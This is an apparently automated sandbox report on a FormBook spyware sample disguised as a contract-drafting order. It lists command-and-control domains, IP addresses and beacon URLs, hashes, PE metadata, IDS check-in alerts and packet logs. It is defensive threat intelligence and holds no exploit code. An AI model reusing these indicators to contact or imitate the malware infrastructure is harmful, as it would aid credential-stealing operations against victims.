                www.avalanchefi.xyz
                13.248.169.48
                truetrueunknown
                r0lqcud7.nbnnn.xyz
                23.225.159.42
                truetrue
                  unknown
                  jalan2.online
                  108.181.189.7
                  truetrue
                    unknown
                    bloodbalancecaps.shop
                    108.179.253.197
                    truetrue
                      unknown
                      www.02760.wang
                      unknown
                      unknownfalse
                        unknown
                        www.jalan2.online
                        unknown
                        unknownfalse
                          unknown
                          www.laohub10.net
                          unknown
                          unknownfalse
                            unknown
                            www.bloodbalancecaps.shop
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://www.jalan2.online/xu9o/?Vblddl=Y1SnkQLh9oyCIrW0o0O4vqPemXX8Spt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrMr8DLl9ZyJ18b2nxQ81rZE0uLnMg7aaVIRg=&At=4ZW0true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.bloodbalancecaps.shop/7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y=&At=4ZW0true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.avalanchefi.xyz/ctta/?At=4ZW0&Vblddl=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4=true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.laohub10.net/dfeq/true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.laohub10.net/dfeq/?Vblddl=gAXULa6m81FP6NaNWEaqYxdrDcJADutaGDMyuCCNna1Q7N6mqkEUlVDne0yRrfV+N8trXlbxkU4RIowztTRv+FQMMrCoDDJ1FGnXoByL22JcZjp7VwlUZtI=&At=4ZW0true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jalan2.online/xu9o/true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.avalanchefi.xyz/ctta/true
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabsc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://bloodbalancecaps.shop/7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5sc.exe, 00000006.00000002.2979542481.00000000043A4000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.0000000002964000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.000000002A2B4000.00000004.80000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://login.lisc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.laohub10.netZrTbKDhAWYKJu.exe, 00000007.00000002.2977906300.00000000005DC000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.ecosia.org/newtab/sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                13.248.169.48
                                                www.avalanchefi.xyzUnited States
                                                16509AMAZON-02UStrue
                                                23.225.159.42
                                                r0lqcud7.nbnnn.xyzUnited States
                                                40065CNSERVERSUStrue
                                                108.179.253.197
                                                bloodbalancecaps.shopUnited States
                                                46606UNIFIEDLAYER-AS-1UStrue
                                                108.181.189.7
                                                jalan2.onlineCanada
                                                852ASN852CAtrue
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1559084
                                                Start date and time:2024-11-20 07:14:07 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 53s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:New Order - RCII900718_Contract Drafting.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@5/4
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 94%
                                                • Number of executed functions: 89
                                                • Number of non-executed functions: 292
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target ZrTbKDhAWYKJu.exe, PID 4208 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                TimeTypeDescription
                                                01:16:31API Interceptor372913x Sleep call for process: sc.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                13.248.169.48need quotations.exeGet hashmaliciousFormBookBrowse
                                                • www.egldfi.xyz/3e55/
                                                Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                • www.tals.xyz/010v/
                                                Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                • www.wajf.net/dkz5/
                                                rG5EzfUhUp.exeGet hashmaliciousSakula RATBrowse
                                                • www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
                                                dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                • www.extrem.tech/ikn1/
                                                Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                • www.sonoscan.org/ew98/
                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                • www.hopeisa.live/v0jl/
                                                DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                • www.layerzero.cfd/8f5m/
                                                rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                • www.reviewpro.shop/aclh/
                                                FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                • www.fitlook.shop/34uy/
                                                108.181.189.7need quotations.exeGet hashmaliciousFormBookBrowse
                                                • www.jalan2.online/lvda/
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                UNIFIEDLAYER-AS-1USarm7.nn-20241120-0508.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 162.144.165.86
                                                http://www.dvdcollections.co.uk/search/redirect.php?deeplink=https://lp-engenharia.com/zerooo/?email=mwright@burbankca.govGet hashmaliciousHTMLPhisherBrowse
                                                • 50.116.87.139
                                                http://volunteeraudio.comGet hashmaliciousUnknownBrowse
                                                • 162.144.112.69
                                                https://t.ly/9nPygGet hashmaliciousUnknownBrowse
                                                • 192.254.189.167
                                                Gherrera_Revised_Record_Adjustment_Antamina_Required_Signature.docx.docGet hashmaliciousUnknownBrowse
                                                • 162.241.225.120
                                                https://docsend.com/view/8bzvs74qq8k89vmwGet hashmaliciousUnknownBrowse
                                                • 162.241.60.177
                                                https://online-e.net/st-manager/click/track?id=795&type=raw&url=https://msc-mu.com/apikey-tyudqnhzdgevhdbasx/secure-redirect%23Darth.Vader%2BDeathStar.com&source_url=https%3A%2F%2Fonline-e.net%2Feven-if-even-though%2F&source_title=Even%20if%E3%81%A8Even%20thoughGet hashmaliciousUnknownBrowse
                                                • 108.167.158.52
                                                http://palmbeachhydroflight.com/Get hashmaliciousUnknownBrowse
                                                • 162.241.224.56
                                                file.exeGet hashmaliciousRemcosBrowse
                                                • 69.49.234.173
                                                exe009.exeGet hashmaliciousEmotetBrowse
                                                • 198.20.228.9
                                                ASN852CAneed quotations.exeGet hashmaliciousFormBookBrowse
                                                • 108.181.189.7
                                                owari.arm.elfGet hashmaliciousUnknownBrowse
                                                • 209.89.133.147
                                                63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                • 23.16.246.111
                                                x86.elfGet hashmaliciousUnknownBrowse
                                                • 64.114.213.248
                                                botx.m68k.elfGet hashmaliciousMiraiBrowse
                                                • 137.186.136.235
                                                botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 199.126.73.29
                                                botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                • 66.183.57.134
                                                ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                • 108.181.20.35
                                                ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                • 108.181.20.35
                                                xd.spc.elfGet hashmaliciousMiraiBrowse
                                                • 142.169.14.239
                                                AMAZON-02USx86-20241120-0553.elfGet hashmaliciousUnknownBrowse
                                                • 34.254.182.186
                                                arm7.nn-20241120-0508.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 3.131.202.239
                                                meow.arm7.elfGet hashmaliciousUnknownBrowse
                                                • 44.252.140.153
                                                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 18.202.159.69
                                                https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29tGet hashmaliciousUnknownBrowse
                                                • 54.154.143.167
                                                mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 3.191.65.152
                                                need quotations.exeGet hashmaliciousFormBookBrowse
                                                • 13.248.169.48
                                                https://atpscan.global.hornetsecurity.com/?d=zgarMAzqF8gJdiyz7BRUZX8-Kt1RoHrhrMmKtaU9kW8&f=VhLn9tqiibnSyqWDnEopjApZtye8WgAc5bwx7BMFWiKwqjA1EcPjZyfvoQy11klP&i=&k=QQhP&m=0jL9ajZ_jxYnMJb2yb4luNRYQCXy24RTS6RPwUyZoAcuBVX0kzGA69aOJSo0d2htwIsi238bOVH3h3HqrhJGfzTuFk7GTjJWYsgIrocXphf5x2p4nZ7S2EABjAck31fG&n=TU5FjsulXTMv8aeSlx257utLr9bUpfdm0dDB4GNEHfOuhOvtIOr62mZHw3PXGZeG&r=qntyoaxGftDLRu_wopiK2t_EdeZaeg9mP15ZZI-qDen_3s7cQ10pAlhKQQnYAIUX&s=c4a8f5ec353e41b8b414bdcf47b33dd5d6b52b0394e0e4a09cc54527f49761c3&u=https%3A%2F%2Fthe1oomisagency.com%2Fthyu%2FGet hashmaliciousUnknownBrowse
                                                • 108.138.7.92
                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 13.125.93.51
                                                arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 185.143.18.152
                                                CNSERVERSUShttp://dgzl77sj9.topGet hashmaliciousUnknownBrowse
                                                • 23.225.172.181
                                                http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                • 23.224.201.90
                                                Hh2x1P87eY.exeGet hashmaliciousUnknownBrowse
                                                • 154.90.47.77
                                                IXru5EKmkc.dllGet hashmaliciousUnknownBrowse
                                                • 154.90.47.77
                                                Hh2x1P87eY.exeGet hashmaliciousUnknownBrowse
                                                • 154.90.47.77
                                                IXru5EKmkc.dllGet hashmaliciousUnknownBrowse
                                                • 154.90.47.77
                                                DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                • 103.135.32.149
                                                speedtest-cli.arm5.elfGet hashmaliciousMiraiBrowse
                                                • 41.216.185.178
                                                http://rbrjflqgjzts.top/loginGet hashmaliciousUnknownBrowse
                                                • 23.224.184.251
                                                2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 154.88.22.102
                                                No context
                                                No context
                                                Process:C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe
                                                File Type:CSV text
                                                Category:dropped
                                                Size (bytes):226
                                                Entropy (8bit):5.360398796477698
                                                Encrypted:false
                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                MD5:3A8957C6382192B71471BD14359D0B12
                                                SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                Process:C:\Windows\SysWOW64\sc.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                Category:dropped
                                                Size (bytes):114688
                                                Entropy (8bit):0.9746603542602881
                                                Encrypted:false
                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.49947988354194
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:New Order - RCII900718_Contract Drafting.exe
                                                File size:503'296 bytes
                                                MD5:ab7ce84e9de63dbe7082872755e8a87c
                                                SHA1:cfe36e1ca460e9033dfcda4bbd2a1373feeb22b9
                                                SHA256:bfb840367f7275924d9f1516fc214fbdd64118a5420bdd17a85d2e57ed9cd5b7
                                                SHA512:3095b0367986da7cef70812837bfe82ee376ff594083e9b896e0431224e95173df786e3c72604d8a26b6777d658644fa818165fb9fbbd1f4430b39e7fb187976
                                                SSDEEP:12288:2GWnuyc6HBpwnItiIt45s4SlkMVwfqosFqsvR3Cj6zlgQ:bSdnwnIVWs4ekEwyo+86RgQ
                                                TLSH:8EB4F118F748B14DC3154AF2569E4DCA11167EA8FACF1606A2C0BFC9B9F6C981133E97
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[Y=g................................. ... ....@.. ....................... ............@................................
                                                Icon Hash:479b332b0b2b3709
                                                Entrypoint:0x46072e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x673D595B [Wed Nov 20 03:36:59 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x606d40x57.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x1c09c.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x620000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x5e7340x5e800597a53394193032b51e5efc06c2dbe04False0.9893017319775133data7.99304503862032IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .reloc0x620000xc0x200c704aa5c935649934d86d3964a362204False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                .rsrc0x640000x1c09c0x1c200fed5a0f851793402bdad3a401179fc1aFalse0.23622395833333334data4.22934906713951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x642200x345fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9850824196315358
                                                RT_ICON0x676800x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m0.10429729090263812
                                                RT_ICON0x77ea80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m0.15717997165800662
                                                RT_ICON0x7c0d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.1970954356846473
                                                RT_ICON0x7e6780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.2523452157598499
                                                RT_ICON0x7f7200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.44858156028368795
                                                RT_GROUP_ICON0x7fb880x5adata0.7888888888888889
                                                RT_VERSION0x7fbe40x2ccdata0.42877094972067037
                                                RT_MANIFEST0x7feb00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                DLLImport
                                                mscoree.dll_CorExeMain
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-11-20T07:16:10.362783+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449811108.179.253.19780TCP
                                                2024-11-20T07:16:10.362783+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449811108.179.253.19780TCP
                                                2024-11-20T07:16:25.981190+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449910108.181.189.780TCP
                                                2024-11-20T07:16:28.502632+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449928108.181.189.780TCP
                                                2024-11-20T07:16:31.393915+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449944108.181.189.780TCP
                                                2024-11-20T07:16:33.637770+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449963108.181.189.780TCP
                                                2024-11-20T07:16:33.637770+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449963108.181.189.780TCP
                                                2024-11-20T07:16:39.358769+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44999913.248.169.4880TCP
                                                2024-11-20T07:16:41.914657+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45000813.248.169.4880TCP
                                                2024-11-20T07:16:44.486980+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45000913.248.169.4880TCP
                                                2024-11-20T07:16:47.040281+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45001013.248.169.4880TCP
                                                2024-11-20T07:16:47.040281+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45001013.248.169.4880TCP
                                                2024-11-20T07:17:02.315974+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001123.225.159.4280TCP
                                                2024-11-20T07:17:04.831630+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001223.225.159.4280TCP
                                                2024-11-20T07:17:07.409732+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001323.225.159.4280TCP
                                                2024-11-20T07:17:10.487544+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45001423.225.159.4280TCP
                                                2024-11-20T07:17:10.487544+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45001423.225.159.4280TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 20, 2024 07:16:09.716360092 CET4981180192.168.2.4108.179.253.197
                                                Nov 20, 2024 07:16:09.721365929 CET8049811108.179.253.197192.168.2.4
                                                Nov 20, 2024 07:16:09.722456932 CET4981180192.168.2.4108.179.253.197
                                                Nov 20, 2024 07:16:09.731165886 CET4981180192.168.2.4108.179.253.197
                                                Nov 20, 2024 07:16:09.736082077 CET8049811108.179.253.197192.168.2.4
                                                Nov 20, 2024 07:16:10.316586971 CET8049811108.179.253.197192.168.2.4
                                                Nov 20, 2024 07:16:10.362782955 CET4981180192.168.2.4108.179.253.197
                                                Nov 20, 2024 07:16:15.316591024 CET8049811108.179.253.197192.168.2.4
                                                Nov 20, 2024 07:16:15.316981077 CET4981180192.168.2.4108.179.253.197
                                                Nov 20, 2024 07:16:15.318197012 CET4981180192.168.2.4108.179.253.197
                                                Nov 20, 2024 07:16:15.322985888 CET8049811108.179.253.197192.168.2.4
                                                Nov 20, 2024 07:16:25.396980047 CET4991080192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:25.402168036 CET8049910108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:25.406132936 CET4991080192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:25.426307917 CET4991080192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:25.431427002 CET8049910108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:25.980603933 CET8049910108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:25.981087923 CET8049910108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:25.981138945 CET8049910108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:25.981189966 CET4991080192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:25.981267929 CET4991080192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:26.941262960 CET4991080192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:27.961002111 CET4992880192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:27.966070890 CET8049928108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:27.966200113 CET4992880192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:27.986664057 CET4992880192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:27.991673946 CET8049928108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:28.502454042 CET8049928108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:28.502528906 CET8049928108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:28.502631903 CET4992880192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:29.503619909 CET4992880192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:30.550103903 CET4994480192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:30.555051088 CET8049944108.181.189.7192.168.2.4
                                                Nov 20, 2024 07:16:30.556669950 CET4994480192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:30.577260971 CET4994480192.168.2.4108.181.189.7
                                                Nov 20, 2024 07:16:30.582354069 CET8049944108.181.189.7192.168.2.4
